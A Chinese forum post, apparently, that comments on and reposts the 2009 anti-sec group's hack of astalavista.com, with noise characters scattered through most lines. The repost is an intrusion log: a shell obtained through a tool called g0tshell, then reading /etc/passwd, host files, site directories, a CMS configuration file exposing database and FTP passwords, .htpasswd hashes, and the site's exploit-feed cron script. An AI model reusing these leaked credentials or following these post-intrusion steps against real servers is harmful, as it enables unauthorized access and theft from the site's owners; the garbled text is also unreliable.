里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
# s/ b0 t+ x$ \$ A9 W u/ R: o! n3 ^
[root@front3 ~]# curl -I litespeedtech.com7 |' O3 O0 g) g1 o& w/ ?
HTTP/1.1 200 OK
9 H$ L* V# V. d0 y5 w4 y/ SDate: Fri, 05 Jun 2009 22:54:51 GMT
4 k H) E) O' e8 P6 R5 H0 G$ _Server: LiteSpeed4 |- y9 [# |& r+ \2 t8 d
* a1 C/ p, p' C9 A) N$ z2 E
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-4 n( O* y- N( H6 V* H) ?4 z9 |
8 B7 ~( f3 C' J$ y% f
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。3 [* ]2 q) d, J" j) P+ X
- g, R/ g$ r/ V2 D# R
% Y9 y) w/ j) G" h
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ * d) u, V% W9 u& L5 ~) o
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \6 k' Z* B# z- X' L
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \% b2 K8 Z T* B* f; o4 i
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
; c8 I% \2 Z& M \/ \/ \/ \/ \/ \/ \/
9 V& |* P9 U( S( H+ ~ The Hacking & Security Community
% s, P/ }& k0 X- m, ?7 |[+] Founded in 1997 by a hacker computer enthusiast1 s" _6 v7 V/ q
[-] Exposed in 2009 by anti-sec group
# ^* R T% e. z
; x- N' h) W: @7 NFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:" j1 q* {# T& f( k$ E0 H
>> 03. Who’s behind the site?
5 `1 X% Z, j( v2 N- o3 a>>9 q0 Z. B+ J P7 B5 }
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
8 T. b1 X! E# L( T% g! f! I3 G2 m4 A: H/ `
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
$ ?/ D) U9 k. P7 `2 q- e>>
# m- `% i7 c) b# `' j( V2 ]>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and! v$ ]+ B9 z9 h: _" L' Z
military institutions.* _) u$ d& `$ q6 ^; `
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.5 H$ X1 t7 F8 q
9 @! @% O7 H! @7 y+ k/ @% W8 e9 d
Why has Astalavista been targeted?* p! i- y- [: G( E2 E( @! Y/ n+ V
, K/ J( r Y& g5 Y/ g$ Y# i, \
Other than the fact that they are not doing any of this for the “community” but1 r9 L* d* c J; L/ S3 F3 |4 }" x" r
for the money, they spread exploits for kids, claim to be a security community
. Y9 V9 e6 b: t, Y' ](with no real sense of security on their own servers), and they charge you $6.66" s1 b2 J: _) J& V
per months to access a dead forum with a directory filled with public releases2 ]/ J/ I9 D+ G: a
and outdated / broken services.4 \, a6 y4 K* x* v2 J) G* d
" T/ g: k, {8 B0 @/ P3 r8 rWe wanted to see how good that “team of security and IT professionals” really is.
# B. t$ v. c1 y3 e8 u' \% |5 u
( {7 x! _5 q, ^# ULet’s begin.$ Y- r: q$ e1 u# {+ U
& M. `/ M2 ^7 {* m# Z6 T" U. w
anti-sec:~# ./g0tshell astalavista.com -p 80
9 U5 `. i [0 |4 V( |6 w1 [[+] Connecting to astalavista.com:804 Q2 }/ a; x* m: z
[+] Grabbing banner…
X+ E! d- E; T& Z. l& z/ JLiteSpeed
$ |' g% ~, H2 O[+] Injecting shellcode…
( i, }$ @9 Q$ k8 g8 u. R; p7 R0 g[-] Wait for it3 w7 ^" `; t' q
( R, | j! n% U0 f0 P& @9 M[~] We g0tshell7 S7 }! ]% u2 q3 S
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
1 f' L k. Q5 ]5 E1 fID: uid=100(apache) gid=500(apache) groups=500(apache)
2 b( J' }& U: G
; K7 h3 K/ x2 _sh-3.2$ cat /etc/passwd& i: Q4 j* X. R+ h. g/ u# t
root:x:0:0:root:/root:/bin/bash
% e) V6 i1 K$ q4 gbin:x:1:1:bin:/bin:/sbin/nologin
" @4 H+ a9 U; f a# c* @daemon:x:2:2:daemon:/sbin:/sbin/nologin, e, b t" ? \6 ]' J2 V
adm:x:3:4:adm:/var/adm:/sbin/nologin3 Q* z7 a2 ^, ]( F- a' H7 S
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin: w0 u+ O) g* `" B
sync:x:5:0:sync:/sbin:/bin/sync
! T8 u2 x3 @& yshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown- H& B, w$ S) p" \- o% p
halt:x:7:0:halt:/sbin:/sbin/halt
% c4 I* A/ Y/ O3 E0 a# U3 o( amail:x:8:12:mail:/var/spool/mail:/sbin/nologin
% q$ M |& f! u% Rnews:x:9:13:news:/etc/news:
& d, _4 E; O( ~; z/ N7 K! a& }' Q/ Quucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin& F" R! S( i" Q, C3 r
operator:x:11:0 perator:/root:/sbin/nologin' |0 A& P/ m- T( W
games:x:12:100:games:/usr/games:/sbin/nologin
* J6 @, @7 \+ c4 H! e5 \gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
9 N0 T0 D2 f+ B& M) l, |5 R& F7 O* Jftp:x:14:50:FTP User:/var/ftp:/sbin/nologin- p$ g. A) h; i4 I: H
nobody:x:99:99:Nobody:/:/sbin/nologin! O$ E' A. C4 p3 n8 i% n+ ~8 o5 T
rpm:x:37:37::/var/lib/rpm:/sbin/nologin# Y3 J7 m8 B1 R
dbus:x:81:81:System message bus:/:/sbin/nologin8 ~. \" q+ x0 v6 y% |) }5 Q
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
3 k# j+ ]% ~2 g3 Kmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
0 K; B6 ^4 Y8 x$ ~. W* Dsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin) W, z/ J$ U5 H3 D- k2 k; i
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin' p; i8 u+ z, l
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin% R) C+ N) f. P: F' K
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin! u; n6 h, x. y( q
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin/ h4 D5 V# P6 j4 j
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
# G& S! X! z5 Q# W5 K vsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin2 ^" k' U2 Z. v9 @! D, U; x
pcap:x:77:77::/var/arpwatch:/sbin/nologin: @/ J% E2 f; E
named:x:25:25:Named:/var/named:/sbin/nologin$ e4 v7 Y F0 i* J# o# i
apache:x:100:500::/var/www:/bin/false
- I1 m9 {) r% i; r1 mdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
) @* P6 ?% J4 t8 ]7 Z! W( K6 emysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
+ c) A5 H! x# g' Awebapps:x:500:501::/var/www/html:/bin/bash K2 G1 T% b. A- g3 X$ P8 ~2 }
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash& |1 |+ A- V5 E- o3 q, n( k
admin:x:501:502::/home/admin:/bin/bash
W1 N5 _% _; j! Njon:x:502:503::/home/jon:/bin/bash+ v: r% V4 t4 A
com:x:503:504::/home/com:/bin/bash( I5 x- j- f9 }% R
ntp:x:38:38::/etc/ntp:/sbin/nologin7 i2 k, V/ d& ^$ f( N: g" ]. w
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin, l. x O2 n; c5 Y5 l
astanet:x:504:505::/home/astanet:/bin/bash- r2 q) f/ R0 i& j+ M J. V
avahi:x:70:70:Avahi daemon:/:/sbin/nologin1 b4 Q' ?& w& h( E# Q0 [7 W
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin) h e# O( Y6 V1 u7 K' \5 i
3 b5 I* ^+ g% K$ V) p2 v, [$ Ksh-3.2$ cat /etc/hosts V( Q1 j4 _' S1 [& b
# Do not remove the following line, or various programs
' [! g* [ k9 S# that require network functionality will fail.
/ s& |1 H& @( C2 ~0 s! ]127.0.0.1 localhost.localdomain localhost) X8 T2 P1 X5 Z- B" w
::1 localhost6.localdomain6 localhost6# J) V. N: M( W+ t% |
80.74.154.172 asta1.astalavistaserver.com% ]$ k8 M/ y4 u; k
3 D. o3 j5 x1 vsh-3.2$ pwd8 ^0 I9 Q7 z. W% @
/home/com/public_html! R T. G- [; L, t( c. B) G
0 d# J9 _* J/ S2 Ash-3.2$ ls -la) [) {) s: D$ a% V$ t
total 18460
+ B3 F8 p0 z* S2 l7 \$ qdrwxr-xr-x 30 com apache 4096 May 28 17:06 .. M% B6 `3 I1 O( z7 V) s
drwx–x–x 11 com com 4096 Jun 25 2008 ..1 y3 I' i/ u$ E% k' g
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin7 S1 v6 w2 p: K, z0 }4 ]
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache8 X" V8 w' l0 H$ e
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
$ O8 F7 [3 A, q" ^; ], h' vdrwxrwxrwx 2 com com 4096 May 19 00:50 config
2 Y+ _* @; J* `0 n8 H+ |drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
6 F; w/ m* [ D, i+ Rdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
" {, ^4 W3 {" i5 {( ndrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing3 p7 f% [$ c2 ~
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
7 v' \7 Z" ~, R4 ydrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__% _$ h( M, g& a0 E" S, m
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php" ]. `/ f( m0 x. `7 ?, ]' m5 O
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd6 }! {- y8 F* P, p f5 t
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor. n4 J- A* h1 Y+ p4 f
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico/ T5 R( V3 ~) Q4 ~
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
/ {0 Y x: v$ u+ ~/ @! Y-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess, j3 X7 c9 I. N3 T6 O4 F
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
9 k% B1 D& Z L/ r-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
5 F5 M% d1 l4 c, `drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
% F- G# H1 U6 _; R2 u* Hdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
+ k3 h8 R5 l, f5 N% N-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php3 g3 U: H, ~) s' ?! ]% ^' ^
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
1 g1 q0 F" K+ G& G i" |drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
$ i* T+ r/ r0 w# q" c1 c( ~drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib2 ?' _( D7 N" e8 T b9 V5 a# r
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media, l1 n( l n! s. B% z
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
; {5 K2 M- k6 V0 \4 ~8 Sdrwxr-xr-x 34 com com 4096 May 28 16:30 modules6 o: Y5 w" Y6 ]/ c, O0 F7 q& {
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin# H3 a! x/ b3 K
drwxrwxr-x 22 com com 4096 May 28 17:06 _new/ J9 C) F" y; }1 g
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old9 m7 }+ p4 ~0 s! T
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
9 W& q1 [! E3 o# jdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
$ T( j' i d( D% a! H, u-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt" j; f4 C, E9 w3 V; A. o1 }
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
7 n9 I9 [5 f% M& }" g p' `-rw-r–r– 1 com com 223 Mar 30 15:32 test.php# P1 H! \+ X% z% a8 A+ A
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
% L9 u6 f' K/ m Udrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp* H2 D1 a1 ?3 \8 b4 G. v
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam8 A1 H( G& ^2 h& y
3 c$ {5 `& z) Psh-3.2$ head -20 index.php( l% e4 O- q; p/ E3 [& X. S/ x
<?php
( k" J4 Q2 \. J/ P T" u; H9 Z H
/**2 R, H% x0 ^0 F8 Q9 P
* The main page for the CMS
. x4 d0 L: t1 b7 m6 H* @copyright CONTREXX CMS - COMVATION AG$ V% H: X f* [( c V: \
* @author Comvation Development Team) s8 i; I e4 l- X$ ^3 w0 S
* @version v1.0.9.10.1 stable
/ g2 j4 J" T# d4 o% t* @package contrexx0 k! A- r" j6 o
* @subpackage core
& L* v J z; i+ g' M! E* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
4 L2 }9 U. V: L. R+ X* @since v0.0.0.0) z D6 M. T: U# L- O! b* I
* @todo Capitalize all class names in project
6 z) j1 z9 ~: ?# V* @uses /config/configuration.php
& c! x- I. ]6 V/ U* e' L* @uses /config/settings.php# q/ I* n. ]8 Q
* @uses /config/version.php6 `0 f6 ~% K/ B2 I" P* _6 Q
* @uses /core/API.php. U2 l8 [3 {. y4 j) u& _
* @uses /core_modules/cache/index.class.php
+ |8 M5 ?; a+ L. B* @uses /core/error.class.php/ B3 Y1 L0 l6 p2 x7 `& p
* @uses /core_modules/banner/index.class.php+ [' ~" D1 u/ l; J7 @
* @uses /core_modules/contact/index.class.php$ b3 V$ t" _7 c0 U3 S
) @* |2 f% Y# V
sh-3.2$ cd config/
3 G* P# \2 V. n0 p' b. U0 j4 Xsh-3.2$ ls -la4 F. L# ] `+ p* u# G8 I& Q
total 32) c$ Z3 o7 [: D" R+ s. A j
drwxrwxrwx 2 com com 4096 May 19 00:50 .$ {$ [4 ~3 j9 j7 n# {
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..% Q/ I4 ~' [& I$ d2 s/ l* j
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php) O. ?8 f1 f- q# p! s( `8 b
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php6 c: t4 ^3 E$ V H" z- f
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php9 b$ _1 n3 z6 s( d( F7 z
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
2 j) [# _7 X/ A5 }& A+ g: z5 G+ s% ]
sh-3.2$ cat configuration.php
1 p: W! z- x2 p) I Y# t/ h[snip]
0 `7 ]. Z3 {& E& V, y$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
" a0 K, R7 j( Q- ~" C! q$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
6 n* ?9 z! v7 t0 U; `! O" i6 P$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
- s7 T+ j- ]8 V6 o$ C$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username$ q3 |5 \. _. U
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password* I' Q: x& G- C
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
/ F. `6 ? d3 e8 L, l8 ^$ q$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)7 T; K# d' a7 {' U/ g& H
[snip]) i, `# ?' d2 ~' d! U- x5 @
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
. E# d+ z: Q }& B6 ]2 J$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode5 L2 {9 f6 T3 ?6 }+ i4 |5 B
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
& q8 W0 G: P) n' W8 i; i$_FTPCONFIG['port'] = 21; // Ftp remote port; I" l5 ~$ G& j) k' E9 O0 r; O3 ~
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username/ B3 `0 v8 C2 ?5 X6 a, V. z
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password, ?& S& M9 h) d
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
q1 t" }( |5 R: F4 X! {$ [8 T o4 g9 ~
sh-3.2$ cd ..
! q) v# n$ l, k8 e* fsh-3.2$ cd dvd/3 D/ o* W. B/ F- u5 V$ |
sh-3.2$ ls -la$ B/ g x+ `0 e, R$ z
total 2913780
, U# [6 y" M0 x* h5 kdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
; z k5 s( N8 m2 v' G8 N6 B( B, W% idrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
9 B4 t# u* u; {1 j; V-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar* d" x% o7 F! ^, Q1 }! D0 v: {
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
0 i m% s7 U5 P: k% [% o# F9 t-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar5 Z. y/ b6 {& o$ g2 W5 d
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess1 w H* I# t6 Z, }3 s- v5 Z
( b# q' T: \$ lsh-3.2$ cat .htaccess. o9 W( W) a( d
authType Basic
/ z6 `$ X d( S; @4 f5 v! eauthName DVD$ `: Q- L; [8 I; n- I8 t: K" Y
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd8 o" G& y2 Q1 X
require valid-user
& p* J7 S+ B3 F1 g' Q9 }6 f' x! m
" I1 i: r; e+ w- k$ r! p8 qsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd" x2 t; Y4 `7 J i+ ?( ^
DVDdownload:CRD8cuY6.MPT66 ~: d* d3 w( s4 b
DVDdownload2:CR8a36.wluFMg( v1 Y/ Q* t% t. i
$ m; E. x) K- D' d+ M" m5 c# ^sh-3.2$ cat test.php
, a0 s* t {6 Z% z! m& g, z<?php
9 R8 x* n, C! b# V$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;) |- h# X, B" ?2 H; p3 T
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
, a* A2 s5 g, |echo $url;
+ g6 v7 R& O1 y9 B$ ]7 ?3 Z?>/ }$ F7 Q# z y9 R5 [! p
3 z' m" k8 j9 F6 W, G
sh-3.2$ cd modifications/
( p, G/ t/ T% N4 ash-3.2$ ls -la
6 y/ L3 ]$ U( K+ ~2 [8 ]+ X0 ttotal 32- d5 H' z1 \" N ~" ^( O7 d
drwxr-xr-x 8 com com 4096 May 11 12:48 .) V- j+ a R8 Q+ n' t5 g) z
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..: \5 o5 I+ t7 y- K1 j: O* ~
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng- S( E( n5 B5 y; z7 b
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
) v: E3 Z: z H7 Jdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools8 f2 [& h: k, [' Y
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc1 H, E O9 z; I; l% N
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search) Q% m. n% }' C6 \3 r7 e$ n
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
, t( C2 {9 g2 ^* z# i: K! J
1 b& o0 ?$ O7 B( D9 S; @sh-3.2$ ls -R
' U7 I" ~. h3 J% n9 W.:& i' V! b, e' F. w# V: Y: E
com_avtng cronjobs onlinetools pjirc search _tmp
. T! D6 i5 i2 ^; a: u
0 ~& s/ K" y( \5 T8 U8 x./com_avtng:& \4 J1 _% k. L* A% p
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
. A1 e' H3 |% T
& `7 i$ {8 q% X' `3 n./com_avtng/scripts:
5 e- h3 F* _ ^% w/ Bpopunder.js% ~% }4 y9 f/ z2 Q( ]: r; d
. b& I- A# h5 n: e7 h
./cronjobs:
) ^3 d5 m4 @/ Z }) \$ t" rexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp1 p5 m8 ?+ G4 U ~! y
. b/ {' q8 ^3 M0 r) o! x0 q' m
./cronjobs/tmp:
) J" D3 P5 l# d- i" Zcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
6 S* I6 [0 |# h4 v: }5 q
& M" t4 p8 H7 T& y./onlinetools:5 c+ i: B, E4 G
index.php+ o+ n* D9 ]' V4 ]8 b% H1 I, s1 T
" Z C+ h& N3 T./pjirc:
3 A2 d& f2 a4 f& _8 b( ta_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt3 f( E: r! \3 h) r9 e" F. [
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt$ S8 i8 S4 }# N+ |) Y; s
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
/ f' r+ M1 y" K; ~" v* ?7 f+ Z: t- |* r
# t$ j. f% j! X1 D7 i4 B! j% n./pjirc/img:
) B" o3 }2 \! j* Yange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif( K/ y3 _( P J- }( i. ]0 L! e
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
* d {* s+ @) {9 X8 Qverre-eau.gif' ^ d3 T) b z0 {; Q; _; k
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 3 G% q7 V' W3 ^4 @9 i
verre-vin.gif
0 \3 }" X0 o. C' Q% Eballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif' i$ Q$ ~7 q2 q+ T6 F# X
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
% C) ~) R2 X' Z4 ?( G
- Q M1 A" Q, y0 I1 S# B./pjirc/snd:+ a; j1 ~- N/ i# [7 W
bell2.au ding.au
- c+ N. y2 f# T) R' t+ k2 j2 U% L' q
./search:
6 ^! z$ {% ^0 J* ^; |9 XsearchEngines.php search.php
8 k. f3 I4 A) k7 F* f" k' Q# R7 a t4 A0 g1 O- _' b$ u8 s
./_tmp:
6 A2 f" \1 V& y: gdefaultPorts.php defaultPorts.txt
, D& ^/ S$ S& u, I% [% E3 L3 z$ w% c
sh-3.2$ cd cronjobs/
6 ^/ m3 U# K& N: Qsh-3.2$ cat exploits.php9 W+ M3 z6 ~" l$ R
[snip]
9 k. e# D2 `2 n! X1 ]* ], i2 e* M$categories = array();: h7 W1 b2 J g
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’; z9 s. \7 }7 o2 n% s
$expolits = file($milw0rmFile);
- D; T$ `) Z; t$ w( G& u' m$ h$comExploits = array();
4 l; N4 D5 V3 |" k/ s3 v[snip]
: _1 A, a9 v$ j) @2 q* [4 z' p// manage data
, A1 Y! S7 K; ofor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
! J" p/ f4 d/ B m( p8 p8 d X$ ?6 G+ X' K4 p
// get path and title: N8 j& n5 ~) G- G) ^: U* }5 a
$expolits[$x] = trim($expolits[$x]);: `. @5 ]1 D0 G
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
U- A, _0 ?+ x* C5 H $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
( W/ [+ U& F) x X( a z$ E
# f5 u- v9 f, K* Z5 t Y6 J // check if file exists
0 [/ K& ^# L8 V if (file_exists($path)) {4 V1 d4 K9 D; h7 g* v
4 W! @, ~" f* u; f4 \ $text = file_get_contents($path);
8 I8 h4 R) i1 d3 b9 ]/ h" Z- T& r/ \2 ]" S* h3 g
// get content and date( v0 _+ z3 n' B+ A0 [- ?
//$text = htmlspecialchars($text, ENT_QUOTES);/ j% R2 ^# N! A& I: m
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));( ?" v- k" h' ~
if ($tmptext != ”) {
9 U: L5 X( N* d; U1 X $text = $tmptext;
; G7 m7 k( v0 F- f6 K } else {9 |' Y6 a5 E! d& K% ` i
$text = addslashes(htmlentities($text, ENT_QUOTES));
n5 G ~5 Q; J( B; z }, m/ e% l5 H. ~6 j
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));; `9 K) p; o; n3 v0 q
$tmp = explode('-', $date); i6 ~2 Q5 J, S5 `% n+ I
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
& j0 V) H2 |0 t, O $cat = getCategory ($path);
J( f6 [: s4 o" W $ext = pathinfo(basename($path));8 y' G- o. S( O
$ext = $ext['extension'];
: Y. m& I, K4 y8 y $qStr = ”: v7 S1 K( F- X; t# q2 V/ _2 u
SELECT `id`1 Y& G+ ^4 w+ [' L1 n1 o
FROM `contrexx_module_exploits`
6 z5 m5 W O6 N1 b) n WHERE `title` = ‘” . $title . “‘
" P& [- W4 _7 q# K" I/ N AND `date` = ‘” . $date . “‘# c9 k7 s( T/ k
“;/ |1 d9 U* D5 H& l% ]" `
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;/ _. O; M; h7 q
$q = $_objDB->query($qStr);
|, Y% i' {2 D* P: S, d4 K7 k8 ]1 {, U; A7 b0 I% V: l& X
if ($q->numRows() == 0) {/ U7 Q6 F/ Z# F; g6 M5 T: w
! O! x" ~ _* {5 N# ~. N8 ? ]
// prepare array# A/ m0 W- ]+ h' [0 |* E
$comExploits[$x]['date'] = $date;' j, z5 i& H: d3 B
$comExploits[$x]['title'] = $title;
, m; C5 ?8 |5 p+ g8 _" W $comExploits[$x]['author'] = ‘milw0rm’;
$ @$ A6 }1 E1 T6 @ $comExploits[$x]['text'] = $text;/ s6 Q1 @/ |; B3 v
$comExploits[$x]['source'] = $ext;5 w" a. z- A* E1 ^
$comExploits[$x]['url1'] = ”;
' ]# M6 H( D/ d9 W- K $comExploits[$x]['url2'] = ”;7 w# }- @& \% a; O$ ~( Z
$comExploits[$x]['catid'] = $cat;" m, k# l7 N5 \4 T% y/ a
$comExploits[$x]['lang'] = ‘2′;; F9 _* J3 g. C8 V/ }4 a
$comExploits[$x]['userid'] = ‘12′;. S2 ]" c1 `) x; _
$comExploits[$x]['startdate'] = ‘0000-00-00′;' y9 J/ }0 Q |9 B" E1 r
$comExploits[$x]['enddate'] = ‘0000-00-00′;
0 z2 N( T. N4 c. w! M6 S $comExploits[$x]['status'] = ‘1′;/ h$ {0 G. t( h" S8 H" d9 I
$comExploits[$x]['changelog'] = $date;
2 r4 Z) x# L4 {6 c7 e2 ^9 L4 Y3 J& a
}8 T( q% v7 h, ^1 s# _3 P3 {# _# h
[snip]& d7 g" W8 K, S) O
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?> k4 {6 p# X! A* {' x) A' X
<rss version=”2.0″> E6 ^) J& k% L' a& P
<channel>
, h d1 t! \3 c6 W <title>ASTALAVISTA.com - Exploits</title>
2 A* H `4 `+ X" G7 Y4 y8 w <link>http://www.astalavista.com/exploits</link>
) ]$ ?5 j* r1 z0 m <description>All availably Exploits.</description>
3 }( d0 h, Q$ i, K2 _ <language>en-us</language>) i: Y: l+ f0 ?% e
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>; k+ |: O( t2 P: j- y+ i4 P: o- r
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
, m. }- `* z, b1 S3 T; w) b& P <generator>Astalavista.com</generator>
